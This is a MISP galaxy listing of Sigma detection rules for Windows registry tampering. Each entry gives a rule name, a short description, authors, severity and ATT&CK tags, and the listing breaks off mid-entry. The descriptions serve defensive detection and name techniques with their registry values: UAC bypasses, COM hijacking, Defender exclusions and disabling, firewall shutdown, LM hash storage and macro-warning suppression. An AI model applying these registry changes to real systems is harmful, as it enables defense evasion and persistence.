UUID 3f6b7b62-61aa-45db-96bd-9c31b36b653c which can be used as unique global reference for RDP Sensitive Settings Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
creation_date 2022/08/06
falsepositive ['Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)']
filename registry_set_terminal_server_tampering.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Add Port Monitor Persistence in Registry

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.

Internal MISP references

UUID 944e8941-f6f6-4ee8-ac05-1c224e923c0e which can be used as unique global reference for Add Port Monitor Persistence in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Unknown']
filename registry_set_add_port_monitor.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.010']
Related clusters

To see the related clusters, click here.

Office Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID baecf8fb-edbf-429f-9ade-31fc3f22b970 which can be used as unique global reference for Office Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_office.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Wow6432Node Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 18f2065c-d36c-464a-a748-bcf909acb2e3 which can be used as unique global reference for Wow6432Node Classes Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node_classes.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Registry Hide Function from User

Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)

Internal MISP references

UUID 5a93eb65-dffa-4543-b761-94aa60098fb6 which can be used as unique global reference for Registry Hide Function from User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/18
falsepositive ['Legitimate admin script']
filename registry_set_hide_function_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting

Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module

Internal MISP references

UUID 396ae3eb-4174-4b9b-880e-dc0364d78a19 which can be used as unique global reference for Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/04/05
falsepositive ['Unknown']
filename registry_set_office_outlook_enable_load_macro_provider_on_boot.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Potential Persistence Via COM Search Order Hijacking

Detects potential COM object hijacking leveraging the COM Search Order

Internal MISP references

UUID a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12 which can be used as unique global reference for Potential Persistence Via COM Search Order Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien
creation_date 2020/04/14
falsepositive ['Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level']
filename registry_set_persistence_search_order.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

UAC Bypass Abusing Winsat Path Parsing - Registry

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Internal MISP references

UUID 6597be7b-ac61-4ac8-bef4-d3ec88174853 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename registry_set_uac_bypass_winsat.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Windows Media Player - Registry

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 5f9db380-ea57-4d1e-beab-8a2d33397e93 which can be used as unique global reference for UAC Bypass Using Windows Media Player - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename registry_set_uac_bypass_wmp.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Internet Explorer DisableFirstRunCustomize Enabled

Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.

Internal MISP references

UUID ab567429-1dfb-4674-b6d2-979fd2f9d125 which can be used as unique global reference for Internet Explorer DisableFirstRunCustomize Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['As this is controlled by group policy as well as user settings. Some false positives may occur.']
filename registry_set_internet_explorer_disable_first_run_customize.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Potential Attachment Manager Settings Attachments Tamper

Detects tampering with attachment manager settings policies attachments (See reference for more information)

Internal MISP references

UUID ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a which can be used as unique global reference for Potential Attachment Manager Settings Attachments Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unlikely']
filename registry_set_policies_attachments_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Windows Defender Exclusions Added - Registry

Detects the Setting of Windows Defender Exclusions

Internal MISP references

UUID a982fc9c-6333-4ffb-a51d-addb04e8b529 which can be used as unique global reference for Windows Defender Exclusions Added - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/07/06
falsepositive ['Administrator actions']
filename registry_set_defender_exclusions.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Change Winevt Channel Access Permission Via Registry

Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.

Internal MISP references

UUID 7d9263bd-dc47-4a58-bc92-5474abab390c which can be used as unique global reference for Change Winevt Channel Access Permission Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/17
falsepositive ['Unknown']
filename registry_set_change_winevt_channelaccess.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

WinSock2 Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID d6c2ce7e-afb5-4337-9ca4-4b5254ed0565 which can be used as unique global reference for WinSock2 Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_winsock2.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential PSFactoryBuffer COM Hijacking

Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.

Internal MISP references

UUID 243380fa-11eb-4141-af92-e14925e77c1b which can be used as unique global reference for Potential PSFactoryBuffer COM Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
creation_date 2023/06/07
falsepositive ['Unknown']
filename registry_set_persistence_comhijack_psfactorybuffer.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Winget Admin Settings Modification

Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks

Internal MISP references

UUID 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236 which can be used as unique global reference for Winget Admin Settings Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ["The event doesn't contain information about the type of change. False positives are expected with legitimate changes"]
filename registry_set_winget_admin_settings_tampering.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence']

Disabled Windows Defender Eventlog

Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections

Internal MISP references

UUID fcddca7c-b9c0-4ddf-98da-e1e2d18b0157 which can be used as unique global reference for Disabled Windows Defender Eventlog in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/04
falsepositive ['Other Antivirus software installations could cause Windows to disable that eventlog (unknown)']
filename registry_set_disabled_microsoft_defender_eventlog.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Enable Local Manifest Installation With Winget

Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.

Internal MISP references

UUID fa277e82-9b78-42dd-b05c-05555c7b6015 which can be used as unique global reference for Enable Local Manifest Installation With Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Administrators or developers might enable this for testing purposes or to install custom private packages']
filename registry_set_winget_enable_local_manifest.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence']

Enable LM Hash Storage

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

Internal MISP references

UUID c420410f-c2d8-4010-856b-dffe21866437 which can be used as unique global reference for Enable LM Hash Storage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/15
falsepositive ['Unknown']
filename registry_set_system_lsa_nolmhash.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Windows Firewall by Registry

Detect set EnableFirewall to 0 to disable the Windows firewall

Internal MISP references

UUID e78c408a-e2ea-43cd-b5ea-51975cf358c0 which can be used as unique global reference for Disable Windows Firewall by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Unknown']
filename registry_set_disable_windows_firewall.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Custom Protocol Handler

Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.

Internal MISP references

UUID fdbf0b9d-0182-4c43-893b-a1eaab92d085 which can be used as unique global reference for Potential Persistence Via Custom Protocol Handler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/30
falsepositive ['Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.']
filename registry_set_persistence_custom_protocol_handler.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Internal MISP references

UUID 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 which can be used as unique global reference for IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
creation_date 2023/09/05
falsepositive ['Unknown']
filename registry_set_ie_security_zone_protocol_defaults_downgrade.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Blue Mockingbird - Registry

Attempts to detect system changes made by Blue Mockingbird

Internal MISP references

UUID 92b0b372-a939-44ed-a11b-5136cf680e27 which can be used as unique global reference for Blue Mockingbird - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick (@tliffick)
creation_date 2020/05/14
falsepositive ['Unknown']
filename registry_set_mal_blue_mockingbird.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1112', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Old TLS1.0/TLS1.1 Protocol Version Enabled

Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.

Internal MISP references

UUID 439957a7-ad86-4a8f-9705-a28131c6821b which can be used as unique global reference for Old TLS1.0/TLS1.1 Protocol Version Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/05
falsepositive ['Legitimate enabling of the old tls versions due to incompatibility']
filename registry_set_tls_protocol_old_version_enabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Default RDP Port Changed to Non Standard Port

Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

Internal MISP references

UUID 509e84b9-a71a-40e0-834f-05470369bd1e which can be used as unique global reference for Default RDP Port Changed to Non Standard Port in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename registry_set_change_rdp_port.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.010']
Related clusters

To see the related clusters, click here.

Disable Windows Defender Functionalities Via Registry Keys

Detects when attackers or tools disable Windows Defender functionalities via the Windows registry

Internal MISP references

UUID 0eb46774-f1ab-4a74-8238-1155855f2263 which can be used as unique global reference for Disable Windows Defender Functionalities Via Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
creation_date 2022/08/01
falsepositive ['Administrator actions via the Windows Defender interface']
filename registry_set_windows_defender_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook Home Page

Detects potential persistence activity via outlook home pages.

Internal MISP references

UUID ddd171b5-2cc6-4975-9e78-f0eccd08cc76 which can be used as unique global reference for Potential Persistence Via Outlook Home Page in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/09
falsepositive ['Unknown']
filename registry_set_persistence_outlook_homepage.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Path In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

Internal MISP references

UUID 9d8f9bb8-01af-4e15-a3a2-349071530530 which can be used as unique global reference for Suspicious Path In Keyboard Layout IME File Registry Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/11/21
falsepositive ['Unknown']
filename registry_set_ime_suspicious_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

New Root or CA or AuthRoot Certificate to Store

Detects the addition of new root, CA or AuthRoot certificates to the Windows registry

Internal MISP references

UUID d223b46b-5621-4037-88fe-fda32eead684 which can be used as unique global reference for New Root or CA or AuthRoot Certificate to Store in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/04
falsepositive ['Unknown']
filename registry_set_install_root_or_ca_certificat.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

New BgInfo.EXE Custom DB Path Registry Configuration

Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.

Internal MISP references

UUID 53330955-dc52-487f-a3a2-da24dcff99b5 which can be used as unique global reference for New BgInfo.EXE Custom DB Path Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/16
falsepositive ['Legitimate use of external DB to save the results']
filename registry_set_bginfo_custom_db.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

UAC Bypass via Sdclt

Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)

Internal MISP references

UUID 5b872a46-3b90-45c1-8419-f675db8053aa which can be used as unique global reference for UAC Bypass via Sdclt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omer Yampel, Christian Burkard (Nextron Systems)
creation_date 2017/03/17
falsepositive ['Unknown']
filename registry_set_uac_bypass_sdclt.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Outlook Macro Execution Without Warning Setting Enabled

Detects the modification of Outlook security setting to allow unprompted execution of macros.

Internal MISP references

UUID e3b50fa5-3c3f-444e-937b-0a99d33731cd which can be used as unique global reference for Outlook Macro Execution Without Warning Setting Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ScoubiMtl
creation_date 2021/04/05
falsepositive ['Unlikely']
filename registry_set_office_outlook_enable_macro_execution.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Trust Access Disable For VBApplications

Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.

Internal MISP references

UUID 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf which can be used as unique global reference for Trust Access Disable For VBApplications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/05/22
falsepositive ['Unlikely']
filename registry_set_office_access_vbom_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Persistence Via Hhctrl.ocx

Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary

Internal MISP references

UUID f10ed525-97fe-4fed-be7c-2feecca941b1 which can be used as unique global reference for Persistence Via Hhctrl.ocx in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unlikely']
filename registry_set_hhctrl_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Registry Disable System Restore

Detects the modification of the registry to disable a system restore on the computer

Internal MISP references

UUID 5de03871-5d46-4539-a82d-3aa992a69a83 which can be used as unique global reference for Registry Disable System Restore in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/04
falsepositive ['Unknown']
filename registry_set_disable_system_restore.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Shim Database In Uncommon Location

Detects the installation of a new shim database where the file is located in a non-default location

Internal MISP references

UUID 6b6976a3-b0e6-4723-ac24-ae38a737af41 which can be used as unique global reference for Potential Persistence Via Shim Database In Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/01
falsepositive ['Unknown']
filename registry_set_persistence_shim_database_uncommon_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Potential Registry Persistence Attempt Via Windows Telemetry

Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.

Internal MISP references

UUID 73a883d0-0348-4be4-a8d8-51031c2564f8 which can be used as unique global reference for Potential Registry Persistence Attempt Via Windows Telemetry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Lednyov Alexey, oscd.community, Sreeman
creation_date 2020/10/16
falsepositive ['Unknown']
filename registry_set_telemetry_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

PowerShell Logging Disabled Via Registry Key Tampering

Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging

Internal MISP references

UUID fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 which can be used as unique global reference for PowerShell Logging Disabled Via Registry Key Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/02
falsepositive ['Unknown']
filename registry_set_powershell_logging_disabled.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

New BgInfo.EXE Custom WMI Query Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"

Internal MISP references

UUID cd277474-5c52-4423-a52b-ac2d7969902f which can be used as unique global reference for New BgInfo.EXE Custom WMI Query Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/16
falsepositive ['Legitimate WMI query']
filename registry_set_bginfo_custom_wmi_query.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Winlogon AllowMultipleTSSessions Enable

Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users

Internal MISP references

UUID f7997770-92c3-4ec9-b112-774c4ef96f96 which can be used as unique global reference for Winlogon AllowMultipleTSSessions Enable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Legitimate use of the multi session functionality']
filename registry_set_winlogon_allow_multiple_tssessions.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Add DisallowRun Execution to Registry

Detect set DisallowRun to 1 to prevent user running specific computer program

Internal MISP references

UUID 275641a5-a492-45e2-a817-7c81e9d9d3e9 which can be used as unique global reference for Add DisallowRun Execution to Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Unknown']
filename registry_set_disallowrun_execution.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

IE Change Domain Zone

Hides the file extension through modification of the registry

Internal MISP references

UUID 45e112d0-7759-4c2a-aa36-9f8fb79d3393 which can be used as unique global reference for IE Change Domain Zone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Administrative scripts']
filename registry_set_change_security_zones.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

Potential Persistence Via DLLPathOverride

Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process

Internal MISP references

UUID a1b1fd53-9c4a-444c-bae0-34a330fc7aa8 which can be used as unique global reference for Potential Persistence Via DLLPathOverride in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unknown']
filename registry_set_persistence_natural_language.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Lolbas OneDriveStandaloneUpdater.exe Proxy Download

Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json

Internal MISP references

UUID 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d which can be used as unique global reference for Lolbas OneDriveStandaloneUpdater.exe Proxy Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/28
falsepositive ['Unknown']
filename registry_set_lolbin_onedrivestandaloneupdater.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

UAC Bypass via Event Viewer

Detects UAC bypass method using Windows event viewer

Internal MISP references

UUID 7c81fec3-1c1d-43b0-996a-46753041b1b6 which can be used as unique global reference for UAC Bypass via Event Viewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/19
falsepositive ['Unknown']
filename registry_set_uac_bypass_eventvwr.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Wow6432Node Windows NT CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 480421f9-417f-4d3b-9552-fd2728443ec8 which can be used as unique global reference for Wow6432Node Windows NT CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Mpnotify

Detects when an attacker register a new SIP provider for persistence and defense evasion

Internal MISP references

UUID 92772523-d9c1-4c93-9547-b0ca500baba3 which can be used as unique global reference for Potential Persistence Via Mpnotify in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way']
filename registry_set_persistence_mpnotify.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

CurrentControlSet Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

